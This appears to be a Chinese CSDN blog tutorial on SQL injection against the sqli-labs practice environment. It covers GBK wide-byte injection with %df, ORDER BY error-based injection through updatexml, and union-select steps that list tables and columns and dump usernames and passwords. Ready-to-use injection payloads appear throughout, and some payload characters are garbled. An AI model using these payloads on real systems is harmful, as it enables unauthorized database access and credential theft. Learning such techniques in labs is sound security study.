sql注入之order by ,宽字节 ,limit注入

最新推荐文章于 2024-05-17 08:34:15 发布
最新推荐文章于 2024-05-17 08:34:15 发布
阅读量710 收藏 1
点赞数 1
分类专栏: 安全 文章标签: sql php mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49137360/article/details/126272287
版权

什么是宽字节?

如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为宽字节

像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节,也就是只有两字节
英文默认占一个字节,中文占两个字

什么是宽字节注入?

原理:宽字节注入发生的位置就是PHP发送请求到MYSQL时字符集使用character_set_client设置值进行了一次编码。在使用PHP连接MySQL的时候,当设置“character_set_client = gbk”时会导致一个编码转换的问题,也就是我们熟悉的宽字节注入

宽字节注入是利用mysql的一个特性,mysql在使用GBK编码(GBK就是常说的宽字节之一,实际上只有两字节)的时候,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字的范围)

GBK首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F),例如%df和%5C会结合;GB2312是被GBK兼容的,它的高位范围是0xA1-0xF7,低位范围是0xA1-0xFE(0x5C不在该范围内),因此不能使用编码吃掉%5c

常见转义函数与配置:addslashes、mysql_real_escape_string、mysql_escape_string、php.ini中magic_quote_gpc的配置

宽字节注入中常用的特殊字符:

  • %df
  • �'
  • �'

其原理是将转义符号\与%DF组合成一个汉字,使其失去效用

注入语句:

%DF' union select 1,2,3 -- -
�' union select 1,2,3 -- -
�' union select 1,2,3 -- -

以sqlilab的第32关为例

输入?id=1'时不报错,被/转义了

根据宽字节的方法进行测试

 id=-1%df' union select 1,2,3 -- -

 sql注入基本语句:

order by 4 ­­ ­
判断有多少列

union select 1,2,3 ­­ ­
判断数据显示点

union select 1,user(),database()­­ 
­显示出登录用户和数据库名

union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' ),3 
查看数据库有哪些表

union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name='users' ),3 
查看对应表有哪些列

union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3
查看账号密码信息

 order by注入

以sql-lab-46关为例

一进入46关页面就提示我们使用 sort :

我们尝试这使用 ?sort=1 发现:

 然后 ?sort=2:

 然后 ?sort=3

 我们发现当我们使用 sort=1 时 表格以第一列进行排列,sort=2 时 表格以第二列进行排列, sort=3 时 表格以第三列进行排序。我们想到了order by 函数 ,猜测可能是与 order by 函数相关的注入。

order by 注入是指其后面的参数是可控的,

order by 不同于我们在 where 后的注入点,不能使用 union 等注入,其后可以跟接 报错注入 或者 时间盲注。

判断库名:?sort=-1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

判断表名:?sort=-1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),0x7e),1)-- q

判断列名:?sort=-1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),0x7e),1)-- q

查询数据:?sort=-1 and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- q

miracle-boy
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql 南邮ctf_字节注入和防御(示例代码)
weixin_42282482的博客
02-07 304
0、前言最近要为了自动化审计搜集所有PHP漏洞,在整理注入的时候,发现字节注入中使用iconv造成的漏洞原理没有真正搞懂,网上的文章也说得不是很清楚,于是看了荣哥(lxsec)以前发的一篇http://www.91ri.org/8611.html,加上我们两个人的讨论,最终有了这一篇深入的研究成果。1、概述主要是由于使用了字节编码造成的。什么是字符集?计算机显示的字符图形与保存该字符时的二进制...
SQL注入order by ,limit字节注入
Miracle_ze的博客
08-09 907
定义:正常情况下GPC开启或者使用addslashes函数过滤GET或POST提交的参数时,我们测试输入的’,就会被转义为’,无法成功闭合或者说逃逸。一般这种情况是不存在注入可能的,但是有一种情况除外,就是当后台数据库编码格式为GBK时,可以添加字符欺骗转义函数,'等不被转义。适用情形:(1)数据库的编码格式为GBK;(2)在PHP中,通过iconv()进行编码转换。原理:加入字节与\构成GBK编码,实现单引号和双引号逃逸。.........
字节注入讲解-墨者学院(SQL注入漏洞测试(字节))
T1ngSh0w的博客
09-18 4945
字节注入原理讲解+墨者学院(SQL注入漏洞测试(字节))题目详解
【每天学习一点新知识】跟咩咩一起学“字节注入
RexHa的博客
10-19 2034
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为字节像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的字节,也就是只有两字节英文默认占一个字节,中文占两个字节
SQL注入——显错注入_sql注入orderby原理(1)
2401_84281703的博客
05-17 803
需要完整版PDF学习资源没有限制。
字节注入详解
热门推荐
qq_45927819的博客
03-26 1万+
文章目录1、涉及函数2、原理分析3、实战南邮nctf-sql injection 3sql-labs-32关 1、涉及函数 addslashes() 函数返回在预定义字符之前添加反斜杠的字符串 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符 mysql_escape_string() 转义一个字符串 2、原理分析 先了解一下什么是窄、字节已经常见字节编码: 当某字符的大小为一个字节时,称其字符为窄字节. 当某字符的大小为两个字节时,称
字节注入
硫酸超的博客
08-07 5326
字节注入函数介绍字符集MySQL字符转换字节注入普通注入字节get注入字节get注入2.0字节post注入2.0字节注入防御 函数介绍 PHP mysql_real_escape_string() 函数 PHP addslashes() 函数 字符集 在了解字节注入之前,我们先来看一看字符集是什么。字符集也叫字符编码,是一种将符号转换为二进制数的映射关系。 几种常见的字符集: ASCII编码:单字节编码 0x00 null 0x20 0x21 ! 0x22 " 0x23 # 0x24 $ 0x
SQL注入基础---order by \ limit \ 字节注入
qq_52016943的博客
08-09 1005
order by 、limit字节注入
16“order by”是怎么工作的?.pptx
09-20
"ORDER BY"是SQL语句中的一个关键部分,用于对查询结果进行排序。在这个场景中,我们关注的是在MySQL数据库中"ORDER BY"的工作原理,特别是在处理大量数据时的性能优化。 首先,创建了一个名为`t`的表,包含`id`...
orcle与mysqlsql语法区别.docx
12-16
相比之下,Oracle没有内置的自动增长类型,需要创建序列(SEQUENCE)来实现类似功能,如`CREATE SEQUENCE 序列号名称 INCREMENT BY 1 START WITH 1 MAXVALUE 99999 CYCLE NOCACHE`,然后在INSERT语句中使用`序列号...
SQL-Server与MySQL差别
01-14
在 **SQL Server** 中,可以使用 `NEWID()` 结合 `ORDER BY NEWID()` 来随机排序记录,然后通过 `TOP` 获取前 N 条记录: ```sql SELECT TOP 10 * FROM TableName ORDER BY NEWID(); ``` 在 **MySQL** 中,则是使用 ...
SQLite的SQL语法
05-23
- **ORDER BY**: 排序结果集。 - **LIMIT OFFSET**: 限制结果集的行数。 - **JOIN**: 结合多个表进行查询。 - **UNION**: 合并多个查询的结果。 #### 九、事务管理 - Transaction - **BEGIN**: 开始事务。 - **...
SQL-Server常用关键字、数据类型和常用语法.docx
最新发布
07-15
- **ORDER BY**:用于按照指定的列排序结果集。 - **LIMIT**:限制查询结果的行数。 - **OFFSET**:跳过结果集中的前 N 行。 - **WITH**:用于定义公共表表达式(Common Table Expression)。 - **WINDOW**:定义...
字节注入原理分析
1stPeak's Blog
06-07 1万+
什么是字节? 如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,成为字节。 像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的字节,也就是只有两字节 英文默认占一个字节,中文占两个字节 什么是字节注入? 原理: 字节注入是利用了mysql的一个特性,即mysql在使用GBK编码时,在url解码时会认为两个字符是一个汉字(前一个ASCII码要大于128,才表示到汉字的范围) 通常情况下,一个utf-8编码的汉子占用3个字节,一个GBK编
渗透测试-SQL注入字节注入
lza20001103的博客
04-20 8561
渗透测试-SQL注入字节注入
SQL注入——字节注入
weixin_74991270的博客
10-10 465
1.转义符“\”有些符号想让他当作单纯的字符,而不是当作符号的时候,一般可以用: \符号比如:\’ \\’   这种情况下,‘和"将被当作正常的字符在数据库之中’与"几乎没有区别,在php之中 ’ 包括的内容完全当作字符串,而 " 包括的内容会进一步进行解析例如:$a=‘hello’;echo ‘$a’;//输出:aecho “$a”;//输出:hello2.为什么产生编码:--为了处理英文字符,产生了ASCII码。
SQL注入字节注入:原理、利用
07-14 1817
SQL-字节注入
SQL注入进阶-order by注入
AkangBoy的博客
11-06 8647
本文从order by原理简介开始,详细描述了order by注入原理以及多种注入姿势,包含order by union select注入order by if()注入order by sleep()注入order by报错注入
sql注入order by猜列数问题
06-01
好的,您的问题是关于SQL注入order by猜列数问题。这是一种常见的SQL注入攻击方式,攻击者试图通过在order by语句中输入不同的值来猜测查询结果集中的列数。 一种常见的猜测列数的方法是使用union select语句,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值